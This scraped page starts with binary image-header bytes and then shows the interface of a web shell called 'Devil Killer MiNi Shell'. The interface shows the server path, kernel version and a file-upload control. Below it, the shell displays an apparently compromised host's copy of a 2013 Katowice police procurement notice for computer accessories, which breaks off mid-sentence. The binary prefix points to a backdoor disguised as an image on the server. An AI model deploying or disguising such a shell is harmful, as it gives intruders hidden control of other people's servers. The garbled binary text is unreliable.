JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/201702-N-2013.html

<p class="kh_header"><b>Katowice: Zakup akcesorii komputerowych -postępowanie nr 2</b><br>
<b>Numer ogłoszenia: 201702 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup akcesorii komputerowych -postępowanie nr 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest sprzedaż i dostawa na rzecz Zamawiającego akcesorii komputerowych określonych w załączniku nr 3 do ogłoszenia - formularz cenowy. 2. Szczegółowy sposób realizacji zamówienia został opisany w załączniku nr 2 ogłoszenia - projekt umowy. 3. Zamawiający żąda aby procesor wskazany w pozycji 71 formularza cenowego - PROCESOR BOX wraz z dedykowanym przez producenta chłodzeniem posiadał wydajności min 1745 pkt w teście PassMark http://cpubenchmark.net (testy z 2013-03-20). niniejszy test stanowi załącznik nr 4 do ogłoszenia 4.Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Na wniosku o dopuszczenie do udziału w postępowaniu Wykonawca składa oświadczenie wskazujące zakres
robót, jaki będzie realizował przy udziale podwykonawcy/ów. 5. W przypadku Wykonawców ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie we wniosku o dopuszczenie do udziału w postępowaniu, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował
każdy z uczestników konsorcjum 6.Jednocześnie Zamawiający przewiduje w ramach zamówienia opcję zwiększenia ilości zakupywanych akcesorii komputerowy Ilość akcesorii zakupionych w ramach opcji będzie wynikać z kwoty stanowiącej różnicę pomiędzy kwotą przewidzianą przez Zamawiającego na realizację
zamówienia, a najniższą ceną z licytacji elektronicznej. Cena jednostkowa akcesoriów komputerowych zakupionych w ramach opcji będzie taka jak cena tych akcesoriów wskazana w formularzu cenowy. Dostawa akcesorii zakupionych w ramach opcji będzie musiała się odbyć w terminie określonym dla realizacji
niniejszego zamówienia tj. w terminie 10 dni od dnia zawarcia umowy. Tym samym Wykonawcy nie będzie przysługiwał dodatkowy czas na realizację zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.71.00-0.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1 Oświadczenie, Wykonawcy, który wygra licytację o udzieleniu gwarancji na dostarczony asortyment
złożone na załączniku nr 5 do ogłoszenia. 2 Wykonawca, którego oferta zostanie wybrana jako
najkorzystniejsza, przed zawarciem umowy dostarczy Zamawiającemu formularz ofertowy oraz
formularz cenowy. 3 W przypadku, gdy Wykonawca powierzy wykonanie zamówienia
podwykonawcy/om oświadczenie Wykonawcy wskazujące, jaki zakres zamówienia będzie realizował
przy udziale podwykonawcy/ów złożone na załączniku nr 1 i 5 do ogłoszenia. 4 W przypadku
Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego (np. konsorcjum)
oświadczenie Wykonawców jaki zakres rzeczowy przedmiotu zamówienia będzie realizował każdy z
Wykonawców występujących wspólnie, złożone na odrębnym dokumencie</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: 1.1. Licytacja prowadzona
będzie na platformie Urzędu Zamówień Publicznych znajdującej się na stronie https://licytacje.uzp.gov.pl 1.2.
Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod
adresem https://licytacje.uzp.gov.pl 1.3. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do
udziału w licytacji, winien wraz z wnioskiem o dopuszczenie go do udziału w licytacji przekazać informację o
swoim loginie. Login winien być przekazany Zamawiającemu w oryginalnej pisowni tzn. z zachowaniem
pisowni dużych i małych liter, numerów, spacji itp. 1.4. W przypadku podania przez Wykonawcę
niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z wnioskiem, Zamawiający dopuszcza
przekazanie loginu najpóźniej dwa dni przed terminem otwarcia licytacji. Brak loginu bądź brak poprawnego
loginu będzie skutkowało brakiem możliwości wzięcia udziału Wykonawcy w licytacji. 2. Wymagania
techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez
producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox
w wersji 2.0 lub wyższej, z zainstalowaną jedną z ww. przeglądarek lub przeglądarką równoważną,
podłączony do sieci Internet.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Licytacja elektroniczna na: zakup akcesorii komputerowych 2. Po zalogowaniu się
na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do aplikacji umożliwiającej
składanie ofert. Wykonawcy składają swoje oferty cenowe w postaci elektronicznej. 3. W toku licytacji
elektronicznej wykonawcy dopuszczeni do udziału w licytacji składają kolejne korzystniejsze postąpienia.
Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 4. Oferta złożona w toku
licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą. 5. W toku licytacji Wykonawcy
proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy
oddzielić od złotych kropką. 6.Cenę oferty brutto stanowi łączny koszt wykonania zamówienia obejmujący
cały asortyment z kosztami dostaw oraz inne koszty z tym związane. Przed przystąpieniem do złożenia
postąpienia Wykonawca winien obliczyć cenę oferty tak, aby ceny jednostkowe wymnożone przez ilości po
zsumowaniu wszystkich pozycji dawały wylicytowaną wartość brutto. 7. Oferta złożona przez Wykonawcę
winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 8. Zamawiający
przyjął za minimalne postąpienie wartość 200,00 PLN. System nie przyjmie postąpienia, którego wysokość
jest mniejsza od określonego minimalnego postąpienia. 9. W toku licytacji system na bieżąco udostępnia
wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących
udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji
nie ujawnia się informacji umożliwiających identyfikację Wykonawców. 10. Zamawiający przyjął za cenę
wywoławczą brutto za całość zamówienia i koszty związane i dostawami przedmiotu zamówienia w
wysokości 167.029,31 PLN 11. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę
brutto. W przypadku podania w trakcie licytacji ceny, której nie da się przeliczyć przez ilość zamawianego
asortymentu wskazaną w załączniku nr 1 do ogłoszenia Wykonawca w trakcie wypełniania formularza
ofertowego zobowiązany jest do prawidłowego przeliczenia ceny, przy czym wartość zaoferowanego
asortymentu nie może przekroczyć ceny, wylicytowanej w trakcie licytacji elektroniczne.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 10 minut od ostatniego postąpienia</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 07.06.2013 godzina 10:00, miejsce: Komenda Wojewódzka Policji w Katowicach 40-038 Katowice ul. Lompy 19. Zespół
Zamówień Publicznych KWP blok C piętro VII pokój 735.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od dnia przekazania Wykonawcom zaproszenia do
składania ofert, godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta jeżeli w ciągu 10min od złożenia najkorzystniejszego postąpienia, żaden z Wyk.
nie złoży korzystniejszego postąpienia lub gdy w okresie 10min od otwarcia licytacji nie zostanie złożone
żadne postąpienie</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Szczegółowe warunki umowy zawarte są w załączonym projekcie umowy w załączniku nr 2 do ogłoszenia
dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CENA: Wykonawca, który wygra licytację, przed zawarciem umowy wypełni Formularz
ofertowy - załącznik nr 5 do ogłoszenia dostępny na stronie http://bip.katowice.kwp.policja.gov.pl oraz
załącznik nr 3 do ogłoszenia - formularz cenowy, dostępny na stronie http://bip.katowice.kwp.policja.gov.pl,
podając w nim ceny jednostkowe brutto dla każdej pozycji poszczególnego asortymentu
(sztukę,opakowanie), które po wymnożeniu przez ilości i zsumowaniu wszystkich wartości pozycji dadzą
wylicytowaną cenę oferty brutto. Formularz cenowy stanowić będzie załącznik do umowy PRZEKAZANIE
WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: 1.Wniosek ma być złożony w zamkniętej,
zabezpieczonej kopercie (kopertach) nie jest dopuszczalne złożenie wniosku w formie elektroniczne - za
sposób zabezpieczenia kopert/y odpowiada Wykonawca. 2. Koperta ma być zaadresowana na
Zamawiającego i oznaczona:ZP-2380-329-4/13 Wniosek o dopuszczenie do udziału w licytacji elektronicznej
na zakup akcesorii komputerowanych. Adres Zamawiającego: Komenda Wojewódzka Policji w Katowicach
Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok C piętro VII pokój 735 Nie otwierać
przed komisyjnym otwarciem wniosków 3. Ponadto koperta winna spełniać warunek uniemożliwiający
odczytanie jej zawartości i oznaczona nazwą (firmą) i adresem Wykonawcy z uwagi na pkt. 4. 4. Wnioski
złożone po terminie nie będą rozpatrywane. Wszystkie wnioski otrzymane po terminie składania zostaną
zwrócone Wykonawcom po upływie ostatecznego terminu składania wniosków. OPIS SPOSOBU
PRZYGOTOWANIA WNIOSKÓW: 1. Wykonawca składa: wypełniony wniosek o dopuszczenie do udziału w
postępowaniu wg. wzoru załącznika nr 1 do ogłoszenia oraz dokumenty i załączniki wskazane w Sekcji III.6
ogłoszenia 2. Wniosek o dopuszczenie do udziału w postępowaniu oraz wszystkie załączniki w tym
dokumenty i oświadczenia, mają być w całości sporządzone w języku polskim, ręcznie, na maszynie do
pisania lub komputerze (w sposób czytelny) oraz podpisany w sposób określony pkt. 3 przez osoby
uprawnione (podpisujące wniosek). Osoba uprawniona to osoba, która jest wymieniona w aktualnym odpisie
z właściwego rejestru lub działająca z jej upoważnienia. 3. Wszystkie dokumenty w złożonym wniosku muszą
być opieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione i
opieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnie przez
osoby uprawnione. Nie dotyczy załączników składanych jako oryginały wystawione i podpisane przez
uprawnione organy np. ZUS. Dokumenty wielostronicowe mogą być opieczętowane pieczątką imienną i
podpisane lub podpisane czytelnie przez osoby uprawnione i opieczętowane pieczęciami firmowymi lub
sporządzone na papierze firmowym i podpisane czytelnie przez osoby uprawnione na pierwszej lub ostatniej
jego stronie. Dokumenty mogą być składane w formie oryginału lub kserokopii poświadczonej przez
Wykonawcę za zgodność z oryginałem. W przypadku składania dokumentów wydanych w języku innym niż
język polski, dokumenty te są składane wraz z tłumaczeniem na język polski, poświadczonym przez
Wykonawcę. Uwaga: Przez podpis czytelny Zamawiający rozumie podpis odręczny, zawierający imię i
nazwisko pozwalający na identyfikację osoby, która go złożyła. 4. W przypadku podpisywania wniosku przez
osobę nie wymienioną w aktualnym odpisie z właściwego rejestru,niezbędne jest we wniosku
pełnomocnictwo dla osoby działającej w imieniu Wykonawcy w formie oryginału lub jego poświadczonej
notarialnie kopii. Pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona
jest osoba podpisująca wniosek o dopuszczenie do udziału w postępowaniu. 5. W przypadku Wykonawców
ubiegających się wspólnie (konsorcjum) o udzielenie zamówienia publicznego na podstawie art. 23 ust. 2
ustawy PZP wynika obowiązek ustanowienia pełnomocnika do reprezentowania ich w prowadzonym
postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. W związku z powyższym
niezbędne jest przedłożenie w wniosku pełnomocnictwa w formie oryginału lub jego poświadczonej
notarialnie kopii w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupy Wykonawców w
sposób umożliwiający identyfikację Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
Uwaga: W przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającego
pełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma
wynikać z samej umowy spółki cywilnej dołączonej do wniosku. 6. Wszelkie miejsca, w których Wykonawca
naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobę uprawnioną). 7.
Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za nieważne. 8. Wnioski o
dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach oceny spełniania
warunków udziału w postępowaniu art. 96 ust 3. Nie ujawnia się informacji umożliwiających identyfikację
Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia oraz informacji stanowiących tajemnicę
przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie
później niż w terminie składania wniosku zastrzegł, że nie mogą być one udostępniane. 9. Jeżeli Wykonawca
chce zastrzec strony ww. wniosku wówczas składa je w dodatkowej zabezpieczonej kopercie, z opisem
INFORMACJE STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA. 10. Podmiot prowadzący działalność
gospodarczą jako osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości
prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner
Konsorcjum firm. 11. W przypadku złożenia przez jednego Wykonawcę dwóch lub więcej wniosków o
dopuszczenie do udziału w postępowaniu Zamawiający uzna złożenie wniosku za ważne i dopuści
Wykonawcę do udziału w postępowaniu na podstawie wszystkich złożonych wniosków. ISTOTNE DLA
STRON POSTANOWIENIA, KTÓRE ZOSTANĄ WPROWADZONE DO TREŚCI ZAWIERANEJ UMOWY W
SPRAWIE ZAMÓWIENIA PUBLICZNEGO Szczegółowe warunki umowy zawarte są w załączonym projekcie
umowy w załączniku nr 2 do ogłoszenia dostępnym na stronie www.bip.katowice.kwp.policja.gov.pl 
INFORMACJA O FORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO
PRZEPROWADZENIU LICYTACJI W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA
PUBLICZNEGO. 1. Przed podpisaniem umowy Wykonawca dostarcza Zamawiającemu wypełniony
formularz ofertowy stanowiący załącznik nr 5 do ogłoszenia dostępny na stronie
www.bip.katowice.kwp.policja.gov.pl oraz formularz cenowy zgodnie z załącznika nr 3 do ogłoszenia
dostępnego na stronie www.bip.katowice.kwp.policja.gov.pl. 2. Błędne wypełnienie formularza ofertowego lub
formularza cenowego będzie skutkowało wezwaniem Wykonawcy do przedłożenia prawidłowego formularza
ofertowego i/lub formularza cenowego , a w przypadku odmowy jego poprawienia Zamawiający uzna, iż
Wykonawca uchyla się od zawarcia umowy w sprawie zamówienia publicznego i będzie miał zastosowanie
art 94 ust. 3 ustawy Prawo Zamówień Publicznych. 3. W przypadku wygrania licytacji przez Wykonawcę
będącego spółką z ograniczoną odpowiedzialnością, którego wartość oferty przewyższa dwukrotnie
wysokość kapitału zakładowego Wykonawca zobowiązany jest najpóźniej w dniu podpisania umowy do
przedłożenia uchwały wspólników lub odpisu umowy spółki wyrażającej zgodę na zaciągnięcie zobowiązania
(art. 230 Kodeksu Spółek Handlowych). Powyższe dotyczy również Wykonawców ubiegających się wspólnie
o udzielenie zamówienia publicznego. 4. W przypadku wygrania licytacji przez Wykonawców ubiegających
się wspólnie o udzielenie zamówienia publicznego przed podpisaniem umowy konieczne jest przedłożenie
umowy konsorcjum, która będzie regulować wzajemną współpracę Wykonawców czyli zawierać
postanowienia dotyczące m.in. realizacji poszczególnych części zamówienia, sposobu dokonywania
rozliczeń. Zgodnie z treścią art. 141 ustawy PZP Wykonawcy ubiegający się wspólnie o udzielenie
zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. Zasady solidarnej
odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego. Umowa regulująca współpracę
podmiotów występujących wspólnie (konsorcjum) ma m.in.: - upoważniać jednego z członków konsorcjum -
Głównego Partnera - jako osobę prawną i reprezentującą go wskazaną osobę fizyczną, do występowania w
imieniu każdego z pozostałych Partnerów we wszystkich sprawach związanych z umową; - stwierdzać, że
Partnerzy będą odpowiedzialni solidarnie za całość podjętych zobowiązań w ramach realizacji zamówienia; -
być zawarta na czas trwania umowy, aż do ostatecznego wygaśnięcia obowiązków i praw wobec
Zamawiającego; - być zawarta w formie pisemnej - określać zakres rzeczowo-finansowy każdego z członków
konsorcjum INFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI
WRAZ ZE WSKAZANIEM PRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO POROZUMIEWANIA
SIĘ Z WYKONAWCAMI: 1. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i
Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. Oświadczenia, wnioski, zawiadomienia oraz
informacje przekazane za pomocą faxu lub drogą elektroniczną uważa się za złożone w terminie, jeżeli ich
treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona na piśmie (doręczone
pocztą lub osobiście) na adres: Komenda Wojewódzka Policji w Katowicach Zespół Zamówień Publicznych
40-038 Katowice ul. J. Lompy 19. (art. 27 ustawy Prawo Zamówień Publicznych). 2. Wykonawcy
zobowiązani są do wskazania we wniosku o dopuszczenie do udziału w postępowaniu stanowiącym
załącznik nr 1 do ogłoszenia numeru telefonu oraz numeru faksu lub adresu poczty elektronicznej, na który
Zamawiający będzie przesyłał Wykonawcy wszelkie pisma przekazywane w ramach postępowania.
Wykonawca wybiera faks albo pocztę elektroniczną według własnego uznania. W przypadku wpisania przez
Wykonawcę zarówno numeru faksu jak i adresu poczty elektronicznej Zamawiający będzie przesyłał
zeskanowane dokumenty pocztą elektroniczną. W przypadku wyboru przez Wykonawcę poczty
elektronicznej Wykonawca ponosi pełną odpowiedzialność za odbieranie przekazywanej poczty. W
